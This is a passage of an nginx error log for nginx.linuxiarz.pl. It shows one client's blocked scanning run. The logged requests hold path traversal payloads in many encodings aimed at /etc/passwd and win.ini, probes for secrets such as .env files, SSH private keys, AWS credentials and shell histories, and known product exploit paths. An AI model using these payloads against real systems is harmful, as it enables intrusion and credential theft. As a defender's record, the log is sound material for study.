138.246.253.7, server: 0.0.0.0:443 +2025/10/24 22:57:22 [error] 2645985#2645985: *230731 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/10/28 11:55:05 [error] 3658523#3658523: *395336 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.netrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:03:34 [error] 3658523#3658523: *396340 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.netrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:06:07 [error] 3658523#3658523: *396506 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:06:32 [error] 3658523#3658523: *396529 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/10/28 12:06:56 [error] 3658523#3658523: *396559 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:07:43 [error] 3658523#3658523: *396605 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:10:30 [error] 3658523#3658523: *396797 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:11:52 [error] 3658523#3658523: *396892 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:12:17 [error] 3658523#3658523: *396931 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:12:45 [error] 3658523#3658523: *396962 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:15:39 [error] 3658523#3658523: *397154 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:16:17 [error] 3658523#3658523: *397188 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/10/28 12:22:31 [error] 3658523#3658523: *397658 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:22:31 [error] 3658523#3658523: *397660 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:22:32 [error] 3658523#3658523: *397667 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:22:32 [error] 3658523#3658523: *397669 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:22:32 [error] 3658523#3658523: *397670 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:22:32 [error] 3658523#3658523: *397671 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:22:32 [error] 3658523#3658523: *397672 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:15 [error] 3658523#3658523: *397828 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:15 [error] 3658523#3658523: *397830 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:15 [error] 3658523#3658523: *397831 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:16 [error] 3658523#3658523: *397833 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:16 [error] 3658523#3658523: *397834 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:16 [error] 3658523#3658523: *397832 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:16 [error] 3658523#3658523: *397835 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:16 [error] 3658523#3658523: *397836 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:16 [error] 3658523#3658523: *397838 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:17 [error] 3658523#3658523: *397840 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:17 [error] 3658523#3658523: *397839 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:17 [error] 3658523#3658523: *397841 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:17 [error] 3658523#3658523: *397842 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:18 [error] 3658523#3658523: *397844 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:18 [error] 3658523#3658523: *397846 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:18 [error] 3658523#3658523: *397847 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:18 [error] 3658523#3658523: *397849 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:19 [error] 3658523#3658523: *397851 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:24:26 [error] 3658523#3658523: *397863 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:27:39 [error] 3658523#3658523: *398324 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:31:14 [error] 3658523#3658523: *398869 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:31:30 [error] 3658523#3658523: *398900 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:36:59 [error] 3658523#3658523: *399679 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:21 [error] 3658523#3658523: *399831 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:36 [error] 3658523#3658523: *399851 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:36 [error] 3658523#3658523: *399852 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:36 [error] 3658523#3658523: *399853 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:37 [error] 3658523#3658523: *399856 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:37 [error] 3658523#3658523: *399857 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:37 [error] 3658523#3658523: *399861 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:37 [error] 3658523#3658523: *399862 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:37 [error] 3658523#3658523: *399864 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:38 [error] 3658523#3658523: *399865 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:38 [error] 3658522#3658522: *399869 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:38 [error] 3658523#3658523: *399871 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:38 [error] 3658523#3658523: *399873 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:38 [error] 3658523#3658523: *399874 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:39 [error] 3658523#3658523: *399875 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:39 [error] 3658523#3658523: *399872 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:39 [error] 3658523#3658523: *399877 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:39 [error] 3658523#3658523: *399878 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:39 [error] 3658523#3658523: *399879 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:40 [error] 3658523#3658523: *399880 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:40 [error] 3658523#3658523: *399881 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:38:40 [error] 3658523#3658523: *399882 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:40:35 [error] 3658523#3658523: *400110 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.msmtprc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:41:49 [error] 3658523#3658523: *400267 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.auth.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:42:53 [error] 3658523#3658523: *400427 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:57:10 [error] 3658523#3658523: *402514 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:57:16 [error] 3658523#3658523: *402521 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:59:13 [error] 3658523#3658523: *402767 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:59:26 [error] 3658523#3658523: *402790 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 12:59:51 [error] 3658523#3658523: *402853 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:00:38 [error] 3658523#3658523: *402964 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:00:49 [error] 3658523#3658523: *402991 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:01:35 [error] 3658523#3658523: *403077 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:02:21 [error] 3658523#3658523: *403176 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:18 [error] 3658523#3658523: *403756 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:23 [error] 3658523#3658523: *403764 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:24 [error] 3658523#3658523: *403766 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:24 [error] 3658523#3658523: *403768 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:24 [error] 3658523#3658523: *403770 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:25 [error] 3658523#3658523: *403769 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:07:27 [error] 3658523#3658523: *403786 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:08:49 [error] 3658523#3658523: *403976 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:19:35 [error] 3658523#3658523: *405681 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:20:19 [error] 3658523#3658523: *405784 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:20:25 [error] 3658523#3658523: *405795 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:21:14 [error] 3658523#3658523: *405900 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:21:43 [error] 3658523#3658523: *405960 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:24:52 [error] 3658523#3658523: *406363 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/10/28 13:28:48 [error] 3658523#3658523: *406885 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:53 [error] 3658523#3658523: *406896 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:54 [error] 3658523#3658523: *406897 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:54 [error] 3658523#3658523: *406898 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:54 [error] 3658523#3658523: *406899 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:54 [error] 3658523#3658523: *406901 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:54 [error] 3658523#3658523: *406903 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:55 [error] 3658523#3658523: *406905 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:55 [error] 3658523#3658523: *406906 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:55 [error] 3658523#3658523: *406907 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406909 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406908 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406911 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406912 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406913 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406914 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:56 [error] 3658523#3658523: *406916 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:57 [error] 3658523#3658523: *406917 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:57 [error] 3658523#3658523: *406918 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:57 [error] 3658523#3658523: *406920 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:57 [error] 3658523#3658523: *406922 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:28:57 [error] 3658523#3658523: *406923 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:29:37 [error] 3658523#3658523: *407028 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:29:52 [error] 3658523#3658523: *407064 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /custom-report-example/..%5C..%5C..%5Cdeployment%5Csharp%5Cicons%5Chome-app.png HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:30:20 [error] 3658523#3658523: *407153 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:30:41 [error] 3658523#3658523: *407207 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:32:25 [error] 3658523#3658523: *407464 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:40:58 [error] 3658523#3658523: *408686 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:11 [error] 3658523#3658523: *409392 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:11 [error] 3658523#3658523: *409394 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:11 [error] 3658523#3658523: *409395 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:11 [error] 3658523#3658523: *409396 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:12 [error] 3658523#3658523: *409397 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:12 [error] 3658523#3658523: *409398 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:12 [error] 3658523#3658523: *409400 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:12 [error] 3658523#3658523: *409401 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:13 [error] 3658523#3658523: *409402 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 